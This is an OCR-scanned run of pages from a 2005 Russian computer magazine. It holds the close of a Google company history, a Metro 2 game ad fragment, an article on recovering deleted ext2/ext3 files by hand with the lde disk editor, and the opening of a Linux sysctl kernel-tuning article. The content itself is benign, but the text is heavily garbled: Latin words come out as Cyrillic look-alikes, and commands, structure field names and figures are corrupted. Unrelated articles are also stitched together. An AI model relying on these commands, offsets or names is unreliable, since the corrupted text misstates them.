Особенно отметили Ооодіе за удобство поиска 
информации. В декабре 1998 года автори- 
тетнейший журнал РС Мадагіпе соста- 
вил список ста лучших сайтов Интер- 
нета. В этом списке оказался и до- 
одіе.сот . С этого началася бур- 
ный рост Ооодіе Іпс. 

В феврале следующего года 
у компании было уж восемь 
сотрудников, а число за- 
просов на сервере перева- 
ливало за 500 ты- 
сяч в день. Гараж 
в Менло-Парке стал 
слишком мал для 
нормальной работы, и 
офис компании переме- 
стился на Юниверсити ав- 
еню города Пало-Альто. В 
июне Ооодіе Іпс. получает 
инвестиций в размере 25 
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миллионов долларов от двух крупнейших в Силиконовой долине 
венчурных компаний — Зеціюіа Сарііаі и КІеіпег Регкіпз СаиІіеІсІ & 
Вуегз. Представители этих компаний, Майк Мориц и Джон Дерр 
(ранее работавший с Зип Місгозузіетз, Атагоп и УаИоо!), стано- 
вятся членами совета директоров Ооодіе. 

К концу 1999 года офисных помещений стало вновь не хватать, и было 
принято решение о постройке собственного здания. 

[Зоодіеріех] После переезда в так называемый Ооодіеріех — новый 
офис, расположенный в Маунтин Вью, компания получила 
свой первый действительно крупный контракт, заключен- 
ный с Атегіса Оп-Ыпе. Став официальным поисковым 
сервером портала АОІ_, Ооодіе получил до 3 миллио- 
нов запросов в день. Во второй половине сентября 
поисковая система перестала быть бета-версией. 

В этом же году Ооодіе вышла за пределы штатов, 
начав предоставлять свои услуги посетителям 
британского портала Ѵігдіп ІМеІ и итальянского Ѵіг- 
діііо. Ооодіе продолжал стремительно покорять 
мир. Такие крупнейшие азиатские порталы, как 
японский ВІОІ_ОВЕ, китайский ІМеіЕазе и южно-ко- 
рейский І_усоз Когеа, стали пользоваться услугами Оо- 
одіе. Крупнейший латиноамериканский портал ІІпіѵегзо 
Опііпе также стал их клиентом. Был подписан контракт с 
УаИоо! — самым популярным сайтом в Интернете. Компания стала 
победителем конкурса журнала ѴѴігесІ, получив «Голос читателей ѴѴі- 
геб». Ооодіе Іпс. открыл свои отделения в Токио и Гамбурге для при- 
влечения рекламодателей. К концу года поисковик обрабатывал 20 
миллионов запросов в день, а в 2001 году уже 100 миллионов. Нако- 
нец, компания начала приносить прибыль. 

Сейчас в Ооодіеріех созданы все необходимые условия для плодо- 
творной работы. Сотрудники могут в любое время воспользоваться 
автоматами с бесплатным кофе, чаем, прохладительными напитка- 
ми. В офис можно приходить с детьми, домашними животными. А в 
столовой готовит один из лучших поваров Калифорнии. В коридорах 
офиса над некоторыми дверьми висят огромные шары красного, 
желтого, синего и зеленого цветов, присутствующих в логотипе ком- 
пании. Теми же цветами нарисованы карандашные рисунки, разве- 
шенные по стенам. На них изображен жизненный путь компании, ее 
главные успехи. На входе в Ооодіеріех стоит монитор, отражающий в 
режиме реального времени запросы, обрабатываемые в данный мо- 
мент поисковиком. На некоторых стенах можно встретить мишени 
для игры в дартс. Двадцать процентов рабочего времени сотрудники 
могут использовать для развития своего потенциала: разработки 
собственных проектов, проведению исследований, написанию статей 
или просто для самообразования. 

Про Ооодіе Іпс. говорят, что быть частью компании — не работа, а 
привилегия. Помимо высокой заработной платы, сотрудники полу- 
чают также акции компании, и многие из служащих 
компании стали миллионерами после выпуска ак- 
ций на рынок. Требования к соискателям 
очень высоки — так среди первых нанятых 
150 человек было 20 докторов техниче- 
ских наук. Сами Брин и Пейдж занима- 
ют должности президентов компании. 

Сергей — президент по технологии, 

Лоренс — президент по продукции. 

На должность председателя совета 
директоров и главного исполни- 
тельного директора они наняли бо- 
лее опытного в бизнесе человека 
— Эрика Шмидта, работавшего до 
Ооодіе в ЫоѵеІІ. Сергей большую 
часть рабочего времени занимается 
организационными вопросами, при- 
нимает решения, связанные с даль- 
нейшей политикой компании. Он также 
активно участвовал в проекте русифика- 
ции Ооодіе — несмотря на то, что он поки- 
нул Россию в пятилетием возрасте, он пре- 
красно говорит по-русски и часто дает отече- 
ственным журналистам интервью на русском языке. 

К 2003 году Ооодіе стал самой популярной поисковой системой в мире: 
200 миллионов запросов в день на 88 языках! В некоторых странах это 
составляло больше 80% от всего объема поисковых услуг в Интернете. 
В новых энциклопедических словарях можно встретить глагол Іо доодіе, 
означающий поиск информации в Сети. 



[Капитализация] В начале 2003 года известная британская компания Іп- 
ІегЬгапсІ объявила Ооодіе брендом года. Поисковику удалось обойти в 
этом звании Арріе и Соса-Соіа. Получая огромные прибыли, Ооодіе в 
2004 году все еще оставалась частной компанией, акции которой при- 
надлежали узкому кругу компаний-инвесторов, ее основателям и работ- 
никам. Для дальнейшего развития стало необходимо выводить Ооодіе 
Іпс. на биржу. Произошло это в августе месяце, когда акции компании 
появились на бирже ІМАЗОАО, вызвав большой ажиотаж и сделав Сер- 
гея и Ларри миллиардерами. Чуть позже журнал РогЬез назовет ав- 
торов Ооодіе самыми молодыми миллиардерами планеты. 
Чтобы исключить влияние корпораций, владеющих боль- 
шим пакетом акций, на аукционе были распроданы 
только акции, не дающие их держателю права голоса 
в компании. Право управлять компанией, основате- 
ли оставили за собой. 

В 2004 году Сергею Брину и Лоренсу Пейджу 
вручили престижную премию Маркони. До 
этого ею были удостоены Тим Бернерс-Ли, 
придумавший ѴѴѴѴѴѴ, Роберт Меткалф — изобрета- 
тель технологии ЕІИегпеІ. Как видишь, разработки 
Сергея и Ларри в области информационных технологий 
были высоко оценены, даже признаны революционными. 
Сайт ТПе Тітез оі Іпсііа проанализировал в 2001 году преи- 
мущества Ооодіе перед другими поисковыми системами. Выяс- 
нилось, что сильные стороны Гугла — это минимальное человеческое 
вмешательство в механизм поиска и постоянное совершенствование ис- 
пользуемой технологии. Важной составляющей успеха компании стало 
также правильное позиционирование на сложившемся рынке интернет- 
услуг на протяжении всего своего существования. Изначально Ооодіе Іпс. 
не рассматривал крупные порталы в качестве своих конкурентов, а видел 
в них потенциальных клиентов. Лицензирование собственной поисковой 
системы другим фирмам превратилось в крупный источник доходов. 
А позже компания начала наращивать количество дополнительно предо- 
ставляемых сервисов. 

Хотя лицензирование технологий другим фирмам и принесло ощутимую 
прибыль, основным источником доходов все же является реклама. Здесь 
Ооодіе вновь проявил себя инноватором. Во-первых, полное отсутствие 
баннеров, надоедливых всплывающих окон и т.п., вместо всего этого — 
обычные ссылки на сайты рекламодателей. Во-вторых, только тематиче- 
ская реклама, соответствующая введенному пользователем запросу. В- 
третьих, рекламные ссылки выделяются среди остальных, что весьма 
честно по отношению к пользователям. Преимущества такой рекламной 
модели по достоинству были оценены как юзерами, так и рекламодате- 
лями. Сотни тысяч рекламодателей заключили контракты с Ооодіе. 

[Ооодіе ѴЗ МісгозоЙ] Сегодня Ооодіе. сот занимает четвертое место 
в списке самых посещаемых сайтов Интернета, уступая УаИоо!, 
МЗІМ и АОІ_. Между этими компаниями началась настоящая война 
за сетевыми юзерами. Вряд ли поисковые системы от 
УаИоо! или АОІ_ смогут конкурировать с Ооодіе, а 
вот портал от Гугла может оказаться вполне 
конкурентоспособным. Впрочем, время по- 
кажет. Реальная угроза для Ооодіе исхо- 
дит сейчас от МісгозоЛ, ведущей работы 
по развитию своей системы МЗЫ, кото- 
рая, конечно же, станет активно ис- 
пользоваться следующими версиями 
их операционных систем. Стив Бал- 
мер на недавней встрече со 
студентами Стэнфорда по- 
делился мыслями о буду- 
щем Ооодіе, отведя тому 
пять лет жизни, а Билл Гейтс на кон- 
ференции ОЗ, прошедшей в Карлсба- 
де, назвал Гугл «пузырем, пока еще 
находящемся на плаву». 

В средствах массовой информации часто 
цитируется фраза Сергея Брина: «Некото- 
рые говорят, что Ооодіе — это Бог. Другие — 
что это сам Сатана. Но если те и другие дума- 
ют, что Ооодіе чересчур влиятельна, то пусть 
вспомнят, что поисковые системы разделяет единствен- 
ный щелчок мыши. Люди приходят на Ооодіе потому, что они ее вы- 
бирают. Мы их не заставляем» © 



Ш работники компании 
Ш рабочее место сотрудницы Ооодіе :) 









Дело № 

СОВЕРШЕНЙТсГІГ 







МЕТРО 2 



* воссозданные с фотографической точность» 
реальные московские места: станции 
метрополитена , Кремль, стройка МГУ; 

* засекреченные объекты* Д6 - военная 
транспортная ветка под Москвой, известная 
также как <зсМетро«2», секретные лаборатории, 
п о д земные -убежища-* 5-ун^ер -Стали ка ; 



подлинное оружие, в том числе не 
встречавшиеся ранее в играх образцы, такие 
как противотанковая винтовка ПТРС-4І. 



начато - ЗУ января ^рОЗ 
окончено 6 октябр е 2005 
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ЮНИТЫ КРЕАТИФФ КОДИНГ ІШІХОЮ СЦЕНА ВЗЛОМ 





мегабайты данных. В популярной оболочке МібпідНІ Соттапсіег также 
имеется похожая команда. К сожалению, она срабатывает не всегда 
(или обнаруживает не все файлы), и тогда приходится прибегать к руч- 
ному восстановлению. Не волнуйся! Это намного проще, чем может по- 
казаться на неискушенный взгляд! 





098 

Второе рождение 
удаленных файлов 

ДЛЯ ВОССТАНОВЛЕНИЯ УДАЛЕННЫХ ФАЙЛОВ 
СУЩЕСТВУЕТ МНОЖЕСТВО ГОТОВЫХ УТИЛИТ, 
НО ДАЛЕКО НЕ ВСЕ (И НЕ ВСЕГДА) ИЗ НИХ РА- 
БОТАЮТ, КАК ОЖИДАЕТСЯ. НАМНОГО НАДЕЖ- 
НЕЕ (И ИНТЕРЕСНЕЕ) ВОССТАНАВЛИВАТЬ ДАН- 
НЫЕ ВРУЧНУЮ. СЕЙЧАС МЫ ПОГРУЗИМСЯ В 
МИР ФАЙЛОВОЙ СИСТЕМЫ ЕХТ2РЗ И ПОСМОТ- 
РИМ, КАКИЕ ШЕСТЕРЕНКИ ПРИВОДЯТ ЕЕ В 

ДВИЖЕНИЕ I Крис Касперски ака мыщъх 



Восстанавливаем 
данные в Ыпих 

[введение] Почему гибнут файлы? Карма 
у них такая. А если серьезно, то существуют ты- 
сячи причин — от вирусов до ошибок челове- 
ческого фактора. Основным способом общения 
с пользователем в Ыпих остается командная 
строка, легко удаляющая все без разбора. Сто- 
ит только отдать слегка неверный приказ и... 
Куда подевались все мои файлы? В МЗ-ЭОЗ 
существовала замечательная утилита ипбеіеіе, 
регулярно вытаскивающая из небытия многие 



[структура файловой системы] В противовес ѴѴіпсІоѵѵз МТ, поддер- 
живающей только ЫТРЗ и РАТ, операционные системы семейства Ыпих 
предлагают довольно широкий ассортимент файловых систем на любой 
вкус: ех121з, ехКЗІз, геізегТз, хіз, )Із. При внешней схожести «потребительс- 
ких» возможностях, их «физическое» устройство сильно отличается, 
и каждая из них требует своей техники восстановления. В рамках одной- 
единственной статьи поднять эту глыбу нереально, поэтому мы решили 
остановиться на ех12Із/ехІЗІз, как на самой популярной файловой систе- 
ме, устанавливаемой по умолчанию в большинстве Ыпих-дистрибутивов. 
Фактически, ехІЗІз — это ех121з с поддержкой журналирования. Отличия 
базовых структур минимальны, но вот процесс удаления файлов в них 
протекает по-разному. В ех121з при удалении файла теряется его имя 
(хотя и не затирается до поры до времени), поэтому автоматическое 
восстановление имен в ней невозможно, зато само содержимое файла 
остается нетронутым. ЕхІЗІз поступает с точностью до наоборот — сох- 
раняет имя файла, но частично уничтожает схему его размещения на 
диске, в результате чего техника восстановления колоссально усложня- 









ется. К тому же ехІЗІз менее производительна, так что для домашних 
компьютеров лучше всего использовать ех121з. Как она устроена? 

В начале раздела расположен Ьооі-сектор, за ним, по смещению 1024 
байта, находится супер-блок (зирег-Ыоск), отвечающий за хранение 
ключевой информации о структуре файловой системы (в ех121з/ехК31з он 
играет точно такую же роль, что и Ьооі-сектор в РАТ и ЫТР5). В нем мно- 
го различных полей, но нас будет интересовать лишь одно: 
з_Іод_Ыоск_5іге. Это 32-разрядное поле, расположенное по смещению 
18Н байт от начала супер-блока. Как и следует из его названия, оно оп- 
ределяет размер одного блока или, в терминологии МЗ-ООЗ/ѴѴіпсІоѵѵз, 
кластера. Размер задается в виде показателя степени, на которую сдви- 
гается размер одного сектора, равный 200П (512 байт). В переводе на 
язык программиста это звучит так: Ыоск_зІ 2 е = 200И « з_Іод_Ыоск_зІ 2 е. 
Например, если з_Іод_Ыоск_зіге равен нулю, размер одного блока бу- 
дет 400П байт, то есть два сектора. 

За супер-блоком идут дескрипторы групп и карты свободного простран- 
ства, в просторечии — битмапы, которые нам малоинтересны, а вот при- 
мыкающую к ним іпосіе-таблицу мы рассмотрим поподробнее, поскольку 
без знания ее структуры ручное восстановление данных просто немысли- 
мо. Таблица представляет собой массив записей типа іпосіе, каждая из 
которых хранит всю информацию об одном файле: тип (обычный файл, 
директория, символьная ссылка и т.д.), схема размещения на диске, логи- 
ческий/физический размер, дата/время создания/модификации/послед- 
него доступа/удаления, количество ссылок на файл и правда доступа: 

[формат представления іпосіе (смещение, размер, описание)] 



0 


2 


цтюсіе 


; формат представления 


2 


2 


і_иіб 


; иісі пользователя 


4 


4 


і_зіге 


; размер файла в байтах 


8 


4 


і_айте 


; время последнего доступа к файлу 


12 


4 


і_сйте 


; время создания файла 


16 


4 


і_тйте 


; время модификации файла 


20 


4 


і_сШте 


; время удаления файла 


24 


2 


і_дісІ 


; діб группы 


26 


2 


і_Ііпкз_соипі 






; количество ссылок на файл (0 — файл удален) 


28 


4 


Цэіоскз 








; количество блоков, принадлежащих файлу 


32 


4 


ИІадз 


; разные флаги 


36 


4 


І ОЗС1 1 


; значение, зависимое от ОС 


40 12x4 


Цэіоск 


; 12 ОІПЕСТ ВЮСКЗ 






(ссылки на первые 12 блоков файла) 


88 


4 


МЫоск 


; 1х ІІ\ЮІВЕСТ ВЮСК 


92 


4 


і_2іЫоск 


; 2х ІІ\ЮІВЕСТ ВЮСК 


96 


4 


і_ЗіЫоск 


; Зх ІЫОІВЕСТ ВЮСК 


100 


4 


і_депегаІіоп 






; поколение файла (используется І\ІРЗ) 


104 


4 


ИіІе_асІ 


; внешние атрибуты 


108 


4 


і_сІіг_асІ 


; наивысший размер 


112 


4 


Уабсіг 


; положение последнего фрагмента 


116 


12 


і_озсІ2 


; значение, зависимое от ОС 



Схема размещения файла на диске организована намного проще, чем в 
ІМТРЗ и РАТ. Каждый файл занимает один или несколько блоков. Даже 
если блок занят только частично, он выделяется файлу целиком (в ос- 




тальных файловых системах таких, например, как II РЗ, предусмотрена 
возможность выделения файлу только части блока, а в ЫТРЗ и ВеізегРЗ 
мелкие файлы могут храниться непосредственно в самой іпосіе, что су- 
щественно уменьшает фрагментацию и увеличивает производитель- 
ность), но вернемся к ех12Із/ехІЗІз. Указатели на 12 первых блоков, зани- 
маемых файлом, хранятся прямо в іпосіе, а точнее — в массиве ЭІРІЕСТ 
ВЮСКЗ, так же называемом массивом непосредственных блоков. Каж- 
дый элемент массива представляет собой 32-битный номер блока. Пос- 
кольку типичный размер блока составляет ~4 Кб (конкретное значение 
зависит от емкости диска и опций форматирования), то массив непосре- 
дственных блоков «переваривает» файлы до 4*12 = 48 Кб. Если длина 
файла превышает эту величину (а у подавляющего большинства файлов 
она превышает), приходится прибегать к блокам косвенной адресации. 
Файловые системы ех12Із/ехІЗІз поддерживают три уровня вложенности. 
Первый блок косвенной адресации хранит уже не указатели на блоки за- 
нятых файлов, а указатели на дополнительные непосредственные блоки, 
и может адресовать до ВЮСК_ЗІ2Е/зІ2еоІ(ОѴѴОРЮ) * ВІ_ОСК_ЗІ2Е = 
4096/4*4 Мб данных. Что ж! Полвека назад это была очень большая ве- 
личина, но сейчас этим никого не удивишь. На этот случай предусмотрен 
блок двойной косвенной адресации, хранящий указатели на косвенные 
блоки, которые хранят ссылки на непосредственные блоки, что позволя- 
ет адресовать (ВЮСК_5І2Е/зі2еоі(ОѴѴОРЮ))**2 * ВІ_ОСК_5І2Е = 4096/4 
** 4096 = 4 Гб данных. Это уже внушительная величина, при которой раз- 
мер файла занимает всю разрядную сетку 32-битной переменной. Боль- 
шинство приложений ограничивают верхний размер обрабатываемых 
файлов 2 или 4 Гб. Тем не менее, файловая система способна хранить 
файлы большего размера. Это осуществляется с помощью трижды кос- 
венного блока, указывающего на дважды косвенные блоки, каждый из 
которых указывает на косвенные блоки, ссылающиеся на блоки непосре- 
дственной адресации. Так что возможности ех12Із/ехІЗІз намного превы- 
шают емкости жестких дисков настоящего и будущего. 

По сравнению с РАТ, такая схема хранения информации о размещении 
является намного более устойчивой к разрушениям. Она как бы «разма- 
зывается» по всему диску, и уничтожить все блоки адресации можно 
разве что динамитом. К тому же, номера блоков хранятся в прямом ви- 
де «как есть», а это значит, что для каждого блока файла можно быст- 
ро найти соответствующий ему косвенный блок, даже если іпосіе пол- 
ностью разрушена. 

Имена файлов хранятся в директориях, и в іпосіе их нет. Директории 
представляют собой специальные служебные файлы, содержащие мас- 
сив записей типа: 



[формат представления массива директорий 
(смещение, размер, описание)] 



0 4 

4 2 

6 1 

7 1 

8 



іпосіе 

гес_Іеп 

пате_Іеп 

ІіІе_іуре 

пате 



; ссылка на іпосі'у 
; длина данной записи 
; длина имени файла 
; тип файла 
; имя файла 



Поле іпосіе содержит порядковый номер іпосіе, которому соответствует 
данное имя файла; поле гес_1еп задает длину текущей записи, 
а пате_1еп — длину имени файла. Само имя хранится в А5СІІ виде. 



[что происходит при удалении файла] При удалении файла в 
системе происходит множество изменений. Опишем лишь самые важ- 
ные из них. Прежде всего, система определяет номер принадлежа- 
щей ему іпосіе. Затем счетчик ссылок уменьшается на единицу, и ес- 
ли при этом он не обращается в нуль, то никакого удаления не проис- 
ходит, поскольку у файла еще остались ссылки. Нас этот случай не 
интересует. Если же ссылок больше нет, то все блоки, ранее принад- 
лежащие файлу, в карте свободного пространства помечаются как 
неиспользуемые, обновляется поле времени удаления, а сама іпосіе 
освобождается, что осуществляется путем модификации іпосіе Ьіітар. 
В ехІЗІз в дополнении к этому обнуляются указатели на 12 блоков не- 
посредственной адресации и 3 блока косвенной адресации, в резуль- 
тате чего схема размещения файла оказывается частично утрачен- 
ной. Файл директорий также затрагивают перемены. Ех121з обнуляет 
поле іпосіе и увеличивает размер предшествующей записи на величи- 
ну удаляемой. Предшествующая запись как бы «поглощает» последу- 
ющую, а связь между именем файла и соответствующей ему іпосіе не- 
обратимо теряется. То есть мы можем восстановить файл, но бес- 
сильны вернуть ему прежнее имя. Правда, можно получить список 
всех удаленных имен, и тем или иным способом попробовать угадать 
«наше» имя. При восстановлении небольшого количества файлов это 
срабатывает, но если удален весь корневой каталог, то ситуация — 



[ХАКЕР 10 [82] 05 > ІІЫІХОЮ 099 ] 





[хакер 10 [82] 05 > ІІЫІХОЮ 100 ] 




внешний вид редактора Ісіе 



ласты. А вот ехІЗІз оставляет поле іпосіе неизменным, благодаря чему 
задача восстановления имени становится тривиальной. Проблема в 
том, что на ехІЗІз утрачивается схема размещения файла, что чрез- 
вычайно затрудняет восстановление его содержимого. 

[подготовка к восстановлению] Если ты только что удалил файл, 
то лучшим способом восстановления будет ВЕЗЕТ. Без шуток! Система 
сбрасывает дисковые буферы не сразу, а спустя некоторое время, поэ- 
тому своевременная перезагрузка или отключение питания часто спаса- 
ет ситуацию, и после загрузки файл окажется цел и невредим, правда, 
на самом диске могут образоваться значительные разрушения, так что 
риск неблагоприятного исхода очень велик, и лучше воспользоваться 
более традиционными средствами восстановления. 

Первым делом размонтируй дисковый раздел или перемонтируй его 
«только на чтение». Лечение активных разделов обычно заканчивается 
очень печально. Если восстанавливаемые файлы находятся на систем- 
ном разделе, в этом случае можно прибегнуть к ЫѵеСО. Лучше всего ис- 
пользовать Кпорріх. Он поддерживает большое количество оборудова- 
ния, не требователен к ресурсам и содержит все необходимые утилиты 
для восстановления. 

Редактируя диск напрямую, его легко испортить. Одно неверное 
движение руки — и гигабайты данных обращаются в прах. Поэтому 
при наличии свободного места рекомендуется создать копию разде- 
ла и все дальнейшие опыты проводить уже над ней. В мире ѴѴіпсІоѵѵз 
для этой цели требуется специальные утилиты (например, Ыогіоп 
(ЗНозІ), но Ыпих — совсем другое дело. Здесь все необходимое на- 
ходится под рукой. Копию раздела проще всего создать командой ср 
/сІеѵ/зсІЫ сішпр, где зсІЫ — имя устройства, а битр — имя файла- 
дампа. Файл-дамп можно разместить на любом свободном разделе 
или даже перегнать на соседнюю машину по сети. Все дисковые ути- 
литы (Ісіе, беЬидзІ, ІзсИк) не заметят подвоха и будут работать с ним, 
как с «родным» разделом. Его даже можно смонтировать как фай- 
ловую систему: тоипі битр тоипі_роіпІ -о Іоор, чтобы убедиться, 
что восстановление прошло успешно. Команда ср битр /беѵ/збЫ 
копирует восстановленный дамп обратно в раздел. 



[ручное восстановление данных в дисковом редакторе] 

Чаще всего линуксоиды редактируют диски при помощи Ібе (Ыпих 
Эізк Ебііог), представляющий собой профессиональный редактор 
консольного типа, переваривающий ех121з, тіпіх, хіаіз и отчасти РАТ. 
Бесплатен, распространяется в исходных текстах (Ібе.зі.пеі) и рабо- 
тает практически в любом *піх. 

Как с ним работать? Сначала открываем восстанавливаемый раздел или 
файл-дамп: Ібе /беѵ/збЫ или Ібе битр. І_бе самостоятельно определяет тип 
файловой системы и после нажатия любой клавиши переходит в режим 
отображения супер-блока. Теперь клавиша <І> переводит нас в режим 
іпобе, а <В> в блочный режим. Жмем <І>, и редактор переходит к первой 
іпобе, принадлежащей корневому каталогу. Для перехода к следующей 
іпобе служит клавиша <Раде Ооѵѵп>, а <Раде 11р>, соответственно, к преды- 
дущей. Таким образом, можно пролистать все іпобе. Как отличить, какие из 
них принадлежат удаленным файлам? В этом нам поможет поле І_ІЫКЗ. Ес- 
ли файл удален, оно равно нулю, и тогда ОЕІ_ЕТЮІ\І ТІМЕ содержит время 
последнего удаления (мы же ведь помним, когда удаляли файл?). Хорошая 
идея — просканировать таблицу іпобе и отсортировать файлы по дате уда- 
ления. Файлы, удаленные последними, окажутся в конце списка. Как вари- 
ант, можно искать дату удаления контекстным поиском. 

Обнаружив подходящую іпобе, перемещаем курсор к первому блоку в 
списке ОІВЕСТ ВІ_ОСК5 (где он и находится по умолчанию) и жмем 
<Р2>. В появившемся меню выбираем пункт ВІоск гтюбе, ѵіеѵѵіпд Ыоск 
ипбег сигзог, (которому, кстати говоря, соответствует горячая клавиша 
<ЗЫК-В>). Редактор перемещает нас на первый блок удаленного файла. 
Просматривая его содержимое в Нех-режиме, пытаемся определить «на 
глаз», похож ли он на наш файл или нет? Для возврата к просмотру 
списка іпобе, можно нажать <І>, а для восстановления файла: <ЗЫК-В>, 
затем еще раз <В> и имя файла-приемника. Все! Файл восстановлен! 

В некоторых случаях предпочтительнее восстанавливать файлы по их 
содержимому. Предположим, удаленный файл содержал строку ИеІІо, 
ѵѵогіб. Нажимаем <Ь (зеагсИ), а затем <А> (ЗеагсН аІІ Ыоск). Если забыть 
нажать <А>, то редактор будет пропускать блоки, принадлежащие уда- 
ленным файлам при поиске, что явно не входит в наши планы. 

Теперь нажимаем <В> для перевода Ібе в Ыоск-тобе, давим </> и вво- 
дим АЗСІІ-строку для поиска. Редактор, пошуршав некоторое время 
жестким диском, находит нужный блок. Смотрим, действительно ли это 
тот блок, который нам нужен, или произошло недоразумение (ложное 
срабатывание). Если блок действительно наш, жмем <СігІ-В>, и редак- 
тор сообщает номер іпобе, которой этот блок принадлежит (он отобра- 
жается внизу экрана, не спутай его с номером последней просмотрен- 
ной іпобе, отображаемой вверху). Клавиша <І> переводит нас в режим 
іпобе, после чего остается нажать <#> и ввести номер іпобе, которую мы 
хотим просмотреть. Если дата удаления выглядит вполне правдоподоб- 
но, нажимаем <5ЫК-В>/<В> и сбрасываем файл на диск. Все это рабо- 
тает только с ех121з, и не пригодно для ехІЗІз, поскольку, как уже гово- 
рилось, она затирает схему размещения файлов на диске, и данные 
приходится восстанавливать буквально по кусочкам. 

[заключение] Ручное восстановление файлов под ех121з совсем нес- 
ложное дело, и этому может научиться любой желающий. Восстановле- 
ние данных — это искусство, которому учатся годами, и если у тебя есть 
желание узнать больше, заходи на мой Кр-сервер пегиті.огд.ги. Здесь 
можно найти уйму интересных материалов по восстановлению. А еще у 
меня запланирована книжка, которая так и называется: «Техника вос- 
становления данных под ѴѴіпбоѵѵз и ІІІМІХ» 0 
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Тюнинг ядра І_іпих 

В НЕКОТОРЫХ СЛУЧАЯХ СТАНДАРТНЫЕ НАСТ- 
РОЙКИ ЯДРА ОКАЗЫВАЮТСЯ НЕ ОПТИМАЛЬ- 
НЫМИ И ПАГУБНО ВЛИЯЮТ НА ПРОИЗВОДИ- 
ТЕЛЬНОСТЬ ВСЕЙ СИСТЕМЫ В ЦЕЛОМ. ЧТОБЫ 
ПОЛЬЗОВАТЕЛЮ НЕ ПРИШЛОСЬ КОПАТЬСЯ В 
ИСХОДНИКАХ И ЗАНОВО ПЕРЕСОБИРАТЬ ЯД- 
РО, БЫЛ ПРИДУМАН УДОБНЫЙ ИНТЕРФЕЙС, 
ПОЗВОЛЯЮЩИЙ ИЗМЕНЯТЬ МНОГИЕ ПЕРЕ- 
МЕННЫЕ ЯДРА ПРЯМО ВО ВРЕМЯ РАБОТЫ ОС I 

рт 01т@ІІ5І.ги) 



Тонкая настройка 
ядра с помощью 
механизма зузсіі 

[теория] Каталог /ргос/зуз является частью 
виртуальной файловой системы ргосіз, о кото- 
рой я рассказывал в прошлой статье. Впервые 
он появился в ядре версии 1 .3.57 в качестве ин- 
терфейса, позволяющего получить доступ к пе- 
ременным ядра. В настоящий момент при по- 
мощи /ргос/зуз можно изменить настройки: 
файловых систем, виртуальной памяти, сете- 
вого стека и внутренних структур ядра. Также 
во многих дистрибутивах можно найти удобную 




вот что говорит тап о /ргос/зуз 



и близкую пользователям ВЗО-систем утилиту /зЫп/зузсіІ, выполняю- 
щую те же функции. 

[практические занятия] Теперь перейдем непосредственно 
к тюнингу. Каталог /ргос/зуз содержит пять основных элементов: 

И кегпеі — структуры ядра 

\ 2 \ ѵт — подсистема виртуальной памяти 

[з] сіеѵ — управление оборудованием 

Щ пеі — сетевые настройки 

[б] Із — файловые системы 

Через файлы, находящиеся в приведенных каталогах, можно управлять 
соответствующими подсистемами ядра. Получение текущих настроек 
происходит путем чтение файла, а изменение — записью в этот файл. 
Разумеется, производить запись имеет право только гооТ Приведу при- 
мер. Узнаем текущее сетевое имя нашей машины: 

$ саі /р го с/зуз/ке г п е І/И озіп ат е 
ІосаІІіозІ 

Изменим его: 




# есііо Ііпихоісі > /ргос/зуз/кегпеі/ііозіпате 

# саі /ргос/зуз/кегпеі/ііозіпате 
Ііпихоісі 

Как видишь, все очень просто и понятно. А теперь выполним тоже са- 
мое, но используя утилиту зузсіі: 

# зузсіі кегпеі.ііозіпате 
кегпеі.ііозіпате = ІосаІІіозІ 

# зузсіі -ѵѵ кегпеІ.Ііо5Іпате=Ііпихоісі 
кегпеі.ііозіпате = Ііпихоісі 

Наверное, ты заметил, что имя переменной — это всего лишь имя файла 
без префикса /ргос/зуз и с точкой вместо символа 7'. 

Для большего удобства существует ко н ф и г /еіс/зузсіі. сопі, где ты можешь 
прописать любые доступные переменные и их значения. Теперь тебе не 
надо заботиться о том, что настройки пропадут после перезагрузки. 

[мир ядра] Изменение настроек ядра — мера не всегда оправданная, 
но в некоторых случаях все-таки полезная. Поэтому мы внимательно 
рассмотрим каталог /ргос/зуз/кегпеі. 

В каталоге /ргос/зуз/кегпеі можно найти три файла, не доступных для за- 
писи: озіуре, озгеіеазе и ѵегзіоп. Содержимое их таково: тип ОС (разу- 
меется, всегда І_іпих), версия ядра (например, 2.6.1 1) и время сборки яд- 
ра, причем первое число строки указывает на число сборок из одного 
дерева исходников. Честно говоря, я так и не понял, зачем нужны эти 
файлы при живом /ргос/ѵегзіоп . 

Еще два файла, бросающиеся в глаза: Иозіпате и ботаіппате. Как можно 
догадаться, отображают сетевое имя и домен машины и, в отличие от пре- 
дыдущих, доступны для записи. Пример их использования я приводил выше. 
Я надеюсь, ты в курсе, что происходит с системой, когда ты нажимаешь 
комбинацию из трех клавиш <СігІ-АІТОеІ>? На самом деле происходит ба- 
нальная вещь: ядро переводит процесс іпй в режим 6, что приводит к пере- 
загрузке с корректным завершением всех сервисов. Такой эффект будет 
происходить при каждом нажатии волшебной комбинации, пока в файле 
/ргос/зуз/кегпеі/сігі-аітсіеі находится значение ноль. Если же поместить в 
этот файл число, превышающее ноль, то ядро будет немедленно отправ- 
лять ПК в перезагрузку (без вызова іпіі, синхронизации буферов и т.д.). 
Для загрузки модулей «на лету» ядро использует стандартную програм- 
му /зЬіп/тосІргоЬе. В этом можно убедиться, заглянув в файл 
/ргос/зуз/кегпеІ/тосІргоЬе. Если команда тобргоЬе находится где-то в 
другом месте или носит другое имя, об этом можно оповестить систему, 
записав в этот файл измененное значение. 

Подобную функцию выполняет файл /ргос/зуз/кегпеі/кіоіріид. Программа, 
имя которой записано в этот файл, будет запускаться каждый раз при 
подключении к ПК нового ПофІ ид-устройства. Ты можешь записать в него 
/ЬіпЛгие, если в системе не предусмотрено подключение таких девайсов. 
На архитектуре І386 максимальный II Ю и ОЮ равен 65535 (16 разрядов). 
В случае, если будет задан идентификатор, превосходящий это число, яд- 
ро само выставит дефолтное значение, которое записано в файлах 
/ргос/зуз/кегп еі/о ѵегііо ѵѵиіб и /ргос/зуз/кегп еі/о ѵегііо ѵѵдіб. По умолчанию в 
обоих файлах находится число 65534, и нет особого смысла его изменять. 
Если ядро поддерживает межпроцессные коммуникации ЗузІетѴ (опция 
ОепегаІ зеіир Зузіет V ІРС), то каталог /ргос/зуз/кегпеі будет содер- 
жать еще семь дополнительных файлов: зет, тздтах, тздтпЬ, тздтпі, 
зИтаІІ, зіиттах, зііттпі. Вообще говоря, ЗузІетѴ ІРС стала самой бес- 
полезной особенностью оригинального ІІЫІХ, перенесенной в І_іпих. В 
настоящее время из трех видов коммуникаций используется только сов- 
местно используемая память, управление которой происходит через 



файлы зіітаіі (максимальное количество сегментов), зііттах (макси- 
мальный размер сегмента) и зііттіп (минимальный размер сегмента). 
Если у тебя есть приложение, работающее одновременно с огромным 
